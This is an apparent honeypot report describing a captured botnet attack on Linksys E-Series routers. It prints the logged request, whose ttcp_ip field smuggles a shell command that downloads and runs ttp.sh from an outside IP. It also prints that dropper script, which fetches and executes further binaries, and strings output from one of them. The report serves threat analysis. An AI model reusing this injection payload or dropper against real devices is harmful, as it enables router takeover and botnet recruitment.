linksys RCE botnet payload caught by HoneyPress

honeypress-payload-3.md

Payload found to be unrelated to WordPress. Seems to be trying to build a botnet by exploiting Linksys E-Series routers

> db.payloads.find({'ip': '179.158.120.213'}).pretty()
{
        "_id" : ObjectId("576a421f83932a00168098be"),
        "Tor" : false,
        "ip" : "179.158.120.213",
        "user-agent" : "Wget(linux)",
        "triggered_url" : "http://178.62.224.8/hndUnblock.cgi",
        "time" : "1466581535",
        "payload" : {
                "data" : {
                        "ttcp_ip" : "-h `cd /tmp;rm -f ttp.sh;wget -O ttp.sh http://176.103.48.34:80/ttp.sh;chmod +x ttp.sh;./ttp.sh`",
                        "ttcp_size" : "2",
                        "StartEPI" : "1",
                        "change_action" : "",
                        "ttcp_num" : "2",
                        "submit_button" : "",
                        "action" : "",
                        "commit" : ""
                },
                "hash" : "063f0d9affbe842ddf2c9dc1ccc1ba630f14683b1901bd4e11e3e326bc30f5af"
        }
}

The payload pulls a script that pulls down some malicious binaries:

root@780e7ade9793:/# curl -s http://176.103.48.34:80/ttp.sh
#!/bin/sh
cd /tmp
wget http://176.103.48.34/ttp/.nttpd
chmod +x .nttpd
./.nttpd
wget http://176.103.48.34/ttp/.sox
chmod +x .sox
./.sox
wget http://176.103.48.34/ttp/updok

root@780e7ade9793:/# curl -s http://176.103.48.34/ttp/.nttpd | strings | head
/lib/ld-uClibc.so.0
_fini
__uClibc_main
_ITM_deregisterTMCloneTable
_ITM_registerTMCloneTable
__deregister_frame_info
__register_frame_info
_Jv_RegisterClasses
strlen
strstr